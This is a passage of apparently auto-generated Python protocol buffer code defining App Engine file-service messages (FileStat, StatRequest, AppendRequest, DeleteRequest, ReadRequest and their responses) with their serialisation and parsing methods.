def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CloseResponse'
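# FileStat: per-file metadata record. 'filename', 'content_type' and
# 'finalized' are required; 'length', 'ctime' and 'mtime' are optional int64s
# (presumably size in bytes and creation/modification times in epoch seconds).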
class FileStat(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_content_type_ = 0
content_type_ = 0
has_finalized_ = 0
finalized_ = 0
has_length_ = 0
length_ = 0
has_ctime_ = 0
ctime_ = 0
has_mtime_ = 0
mtime_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def content_type(self): return self.content_type_
def set_content_type(self, x):
self.has_content_type_ = 1
self.content_type_ = x
def clear_content_type(self):
if self.has_content_type_:
self.has_content_type_ = 0
self.content_type_ = 0
def has_content_type(self): return self.has_content_type_
def finalized(self): return self.finalized_
def set_finalized(self, x):
self.has_finalized_ = 1
self.finalized_ = x
def clear_finalized(self):
if self.has_finalized_:
self.has_finalized_ = 0
self.finalized_ = 0
def has_finalized(self): return self.has_finalized_
def length(self): return self.length_
def set_length(self, x):
self.has_length_ = 1
self.length_ = x
def clear_length(self):
if self.has_length_:
self.has_length_ = 0
self.length_ = 0
def has_length(self): return self.has_length_
def ctime(self): return self.ctime_
def set_ctime(self, x):
self.has_ctime_ = 1
self.ctime_ = x
def clear_ctime(self):
if self.has_ctime_:
self.has_ctime_ = 0
self.ctime_ = 0
def has_ctime(self): return self.has_ctime_
def mtime(self): return self.mtime_
def set_mtime(self, x):
self.has_mtime_ = 1
self.mtime_ = x
def clear_mtime(self):
if self.has_mtime_:
self.has_mtime_ = 0
self.mtime_ = 0
def has_mtime(self): return self.has_mtime_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_content_type()): self.set_content_type(x.content_type())
if (x.has_finalized()): self.set_finalized(x.finalized())
if (x.has_length()): self.set_length(x.length())
if (x.has_ctime()): self.set_ctime(x.ctime())
if (x.has_mtime()): self.set_mtime(x.mtime())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_content_type_ != x.has_content_type_: return 0
if self.has_content_type_ and self.content_type_ != x.content_type_: return 0
if self.has_finalized_ != x.has_finalized_: return 0
if self.has_finalized_ and self.finalized_ != x.finalized_: return 0
if self.has_length_ != x.has_length_: return 0
if self.has_length_ and self.length_ != x.length_: return 0
if self.has_ctime_ != x.has_ctime_: return 0
if self.has_ctime_ and self.ctime_ != x.ctime_: return 0
if self.has_mtime_ != x.has_mtime_: return 0
if self.has_mtime_ and self.mtime_ != x.mtime_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_content_type_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: content_type not set.')
if (not self.has_finalized_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: finalized not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthVarInt64(self.content_type_)
if (self.has_length_): n += 1 + self.lengthVarInt64(self.length_)
if (self.has_ctime_): n += 1 + self.lengthVarInt64(self.ctime_)
if (self.has_mtime_): n += 1 + self.lengthVarInt64(self.mtime_)
return n + 4
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_content_type_):
n += 1
n += self.lengthVarInt64(self.content_type_)
if (self.has_finalized_):
n += 2
if (self.has_length_): n += 1 + self.lengthVarInt64(self.length_)
if (self.has_ctime_): n += 1 + self.lengthVarInt64(self.ctime_)
if (self.has_mtime_): n += 1 + self.lengthVarInt64(self.mtime_)
return n
def Clear(self):
self.clear_filename()
self.clear_content_type()
self.clear_finalized()
self.clear_length()
self.clear_ctime()
self.clear_mtime()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
out.putVarInt32(24)
out.putBoolean(self.finalized_)
if (self.has_length_):
out.putVarInt32(32)
out.putVarInt64(self.length_)
if (self.has_ctime_):
out.putVarInt32(40)
out.putVarInt64(self.ctime_)
if (self.has_mtime_):
out.putVarInt32(48)
out.putVarInt64(self.mtime_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_content_type_):
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_finalized_):
out.putVarInt32(24)
out.putBoolean(self.finalized_)
if (self.has_length_):
out.putVarInt32(32)
out.putVarInt64(self.length_)
if (self.has_ctime_):
out.putVarInt32(40)
out.putVarInt64(self.ctime_)
if (self.has_mtime_):
out.putVarInt32(48)
out.putVarInt64(self.mtime_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_content_type(d.getVarInt32())
continue
if tt == 24:
self.set_finalized(d.getBoolean())
continue
if tt == 32:
self.set_length(d.getVarInt64())
continue
if tt == 40:
self.set_ctime(d.getVarInt64())
continue
if tt == 48:
self.set_mtime(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_content_type_: res+=prefix+("content_type: %s\n" % self.DebugFormatInt32(self.content_type_))
if self.has_finalized_: res+=prefix+("finalized: %s\n" % self.DebugFormatBool(self.finalized_))
if self.has_length_: res+=prefix+("length: %s\n" % self.DebugFormatInt64(self.length_))
if self.has_ctime_: res+=prefix+("ctime: %s\n" % self.DebugFormatInt64(self.ctime_))
if self.has_mtime_: res+=prefix+("mtime: %s\n" % self.DebugFormatInt64(self.mtime_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kcontent_type = 2
kfinalized = 3
klength = 4
kctime = 5
kmtime = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "content_type",
3: "finalized",
4: "length",
5: "ctime",
6: "mtime",
}, 6)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
}, 6, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FileStat'
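# StatRequest: selects files to stat either by exact 'filename' or by
# 'file_glob' pattern; both fields are optional strings.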
class StatRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_file_glob_ = 0
file_glob_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def file_glob(self): return self.file_glob_
def set_file_glob(self, x):
self.has_file_glob_ = 1
self.file_glob_ = x
def clear_file_glob(self):
if self.has_file_glob_:
self.has_file_glob_ = 0
self.file_glob_ = ""
def has_file_glob(self): return self.has_file_glob_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_file_glob()): self.set_file_glob(x.file_glob())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_file_glob_ != x.has_file_glob_: return 0
if self.has_file_glob_ and self.file_glob_ != x.file_glob_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
if (self.has_file_glob_): n += 1 + self.lengthString(len(self.file_glob_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
if (self.has_file_glob_): n += 1 + self.lengthString(len(self.file_glob_))
return n
def Clear(self):
self.clear_filename()
self.clear_file_glob()
def OutputUnchecked(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_file_glob_):
out.putVarInt32(18)
out.putPrefixedString(self.file_glob_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_file_glob_):
out.putVarInt32(18)
out.putPrefixedString(self.file_glob_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 18:
self.set_file_glob(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_file_glob_: res+=prefix+("file_glob: %s\n" % self.DebugFormatString(self.file_glob_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kfile_glob = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "file_glob",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.StatRequest'
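# StatResponse: a repeated list of FileStat records plus the required
# 'more_files_found' flag indicating whether further results were omitted.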
class StatResponse(ProtocolBuffer.ProtocolMessage):
has_more_files_found_ = 0
more_files_found_ = 0
def __init__(self, contents=None):
self.stat_ = []
if contents is not None: self.MergeFromString(contents)
def stat_size(self): return len(self.stat_)
def stat_list(self): return self.stat_
def stat(self, i):
return self.stat_[i]
def mutable_stat(self, i):
return self.stat_[i]
def add_stat(self):
x = FileStat()
self.stat_.append(x)
return x
def clear_stat(self):
self.stat_ = []
def more_files_found(self): return self.more_files_found_
def set_more_files_found(self, x):
self.has_more_files_found_ = 1
self.more_files_found_ = x
def clear_more_files_found(self):
if self.has_more_files_found_:
self.has_more_files_found_ = 0
self.more_files_found_ = 0
def has_more_files_found(self): return self.has_more_files_found_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.stat_size()): self.add_stat().CopyFrom(x.stat(i))
if (x.has_more_files_found()): self.set_more_files_found(x.more_files_found())
def Equals(self, x):
if x is self: return 1
if len(self.stat_) != len(x.stat_): return 0
for e1, e2 in zip(self.stat_, x.stat_):
if e1 != e2: return 0
if self.has_more_files_found_ != x.has_more_files_found_: return 0
if self.has_more_files_found_ and self.more_files_found_ != x.more_files_found_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.stat_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_more_files_found_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: more_files_found not set.')
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.stat_)
for i in xrange(len(self.stat_)): n += self.lengthString(self.stat_[i].ByteSize())
return n + 2
def ByteSizePartial(self):
n = 0
n += 1 * len(self.stat_)
for i in xrange(len(self.stat_)): n += self.lengthString(self.stat_[i].ByteSizePartial())
if (self.has_more_files_found_):
n += 2
return n
def Clear(self):
self.clear_stat()
self.clear_more_files_found()
def OutputUnchecked(self, out):
for i in xrange(len(self.stat_)):
out.putVarInt32(10)
out.putVarInt32(self.stat_[i].ByteSize())
self.stat_[i].OutputUnchecked(out)
out.putVarInt32(16)
out.putBoolean(self.more_files_found_)
def OutputPartial(self, out):
for i in xrange(len(self.stat_)):
out.putVarInt32(10)
out.putVarInt32(self.stat_[i].ByteSizePartial())
self.stat_[i].OutputPartial(out)
if (self.has_more_files_found_):
out.putVarInt32(16)
out.putBoolean(self.more_files_found_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_stat().TryMerge(tmp)
continue
if tt == 16:
self.set_more_files_found(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.stat_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("stat%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_more_files_found_: res+=prefix+("more_files_found: %s\n" % self.DebugFormatBool(self.more_files_found_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstat = 1
kmore_files_found = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "stat",
2: "more_files_found",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.StatResponse'
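# AppendRequest: appends the required 'data' bytes to the required 'filename';
# the optional 'sequence_key' string presumably lets the backend ignore
# duplicate appends from retried calls.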
class AppendRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_data_ = 0
data_ = ""
has_sequence_key_ = 0
sequence_key_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def data(self): return self.data_
def set_data(self, x):
self.has_data_ = 1
self.data_ = x
def clear_data(self):
if self.has_data_:
self.has_data_ = 0
self.data_ = ""
def has_data(self): return self.has_data_
def sequence_key(self): return self.sequence_key_
def set_sequence_key(self, x):
self.has_sequence_key_ = 1
self.sequence_key_ = x
def clear_sequence_key(self):
if self.has_sequence_key_:
self.has_sequence_key_ = 0
self.sequence_key_ = ""
def has_sequence_key(self): return self.has_sequence_key_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_data()): self.set_data(x.data())
if (x.has_sequence_key()): self.set_sequence_key(x.sequence_key())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_data_ != x.has_data_: return 0
if self.has_data_ and self.data_ != x.data_: return 0
if self.has_sequence_key_ != x.has_sequence_key_: return 0
if self.has_sequence_key_ and self.sequence_key_ != x.sequence_key_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_data_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: data not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthString(len(self.data_))
if (self.has_sequence_key_): n += 1 + self.lengthString(len(self.sequence_key_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_data_):
n += 1
n += self.lengthString(len(self.data_))
if (self.has_sequence_key_): n += 1 + self.lengthString(len(self.sequence_key_))
return n
def Clear(self):
self.clear_filename()
self.clear_data()
self.clear_sequence_key()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(18)
out.putPrefixedString(self.data_)
if (self.has_sequence_key_):
out.putVarInt32(26)
out.putPrefixedString(self.sequence_key_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_data_):
out.putVarInt32(18)
out.putPrefixedString(self.data_)
if (self.has_sequence_key_):
out.putVarInt32(26)
out.putPrefixedString(self.sequence_key_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 18:
self.set_data(d.getPrefixedString())
continue
if tt == 26:
self.set_sequence_key(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_data_: res+=prefix+("data: %s\n" % self.DebugFormatString(self.data_))
if self.has_sequence_key_: res+=prefix+("sequence_key: %s\n" % self.DebugFormatString(self.sequence_key_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kdata = 2
ksequence_key = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "data",
3: "sequence_key",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.AppendRequest'
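# AppendResponse: an empty acknowledgement message with no fields.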
class AppendResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.AppendResponse'
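# DeleteRequest: names the single file to delete via the required 'filename'.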
class DeleteRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
return n
def Clear(self):
self.clear_filename()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.DeleteRequest'
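# DeleteResponse: an empty acknowledgement message with no fields.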
class DeleteResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.DeleteResponse'
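# ReadRequest: a byte-range read; 'filename', 'pos' (start offset) and
# 'max_bytes' (read limit) are all required.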
class ReadRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_pos_ = 0
pos_ = 0
has_max_bytes_ = 0
max_bytes_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def pos(self): return self.pos_
def set_pos(self, x):
self.has_pos_ = 1
self.pos_ = x
def clear_pos(self):
if self.has_pos_:
self.has_pos_ = 0
self.pos_ = 0
def has_pos(self): return self.has_pos_
def max_bytes(self): return self.max_bytes_
def set_max_bytes(self, x):
self.has_max_bytes_ = 1
self.max_bytes_ = x
def clear_max_bytes(self):
if self.has_max_bytes_:
self.has_max_bytes_ = 0
self.max_bytes_ = 0
def has_max_bytes(self): return self.has_max_bytes_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_pos()): self.set_pos(x.pos())
if (x.has_max_bytes()): self.set_max_bytes(x.max_bytes())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_pos_ != x.has_pos_: return 0
if self.has_pos_ and self.pos_ != x.pos_: return 0
if self.has_max_bytes_ != x.has_max_bytes_: return 0
if self.has_max_bytes_ and self.max_bytes_ != x.max_bytes_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_pos_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: pos not set.')
if (not self.has_max_bytes_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: max_bytes not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthVarInt64(self.pos_)
n += self.lengthVarInt64(self.max_bytes_)
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_pos_):
n += 1
n += self.lengthVarInt64(self.pos_)
if (self.has_max_bytes_):
n += 1
n += self.lengthVarInt64(self.max_bytes_)
return n
def Clear(self):
self.clear_filename()
self.clear_pos()
self.clear_max_bytes()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(16)
out.putVarInt64(self.pos_)
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_pos_):
out.putVarInt32(16)
out.putVarInt64(self.pos_)
if (self.has_max_bytes_):
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_pos(d.getVarInt64())
continue
if tt == 24:
self.set_max_bytes(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_pos_: res+=prefix+("pos: %s\n" % self.DebugFormatInt64(self.pos_))
if self.has_max_bytes_: res+=prefix+("max_bytes: %s\n" % self.DebugFormatInt64(self.max_bytes_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kpos = 2
kmax_bytes = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "pos",
3: "max_bytes",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadRequest'
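# ReadResponse: returns the bytes read in the required 'data' field.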
class ReadResponse(ProtocolBuffer.ProtocolMessage):
has_data_ = 0
data_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def data(self): return self.data_
def set_data(self, x):
self.has_data_ = 1
self.data_ = x
def clear_data(self):
if self.has_data_:
self.has_data_ = 0
self.data_ = ""
def has_data(self): return self.has_data_
def MergeFrom(self, x):
assert x is not self
if (x.has_data()): self.set_data(x.data())
def Equals(self, x):
if x is self: return 1
if self.has_data_ != x.has_data_: return 0
if self.has_data_ and self.data_ != x.data_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_data_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: data not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.data_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_data_):
n += 1
n += self.lengthString(len(self.data_))
return n
def Clear(self):
self.clear_data()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.data_)
def OutputPartial(self, out):
if (self.has_data_):
out.putVarInt32(10)
out.putPrefixedString(self.data_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_data(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_data_: res+=prefix+("data: %s\n" % self.DebugFormatString(self.data_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdata = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "data",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
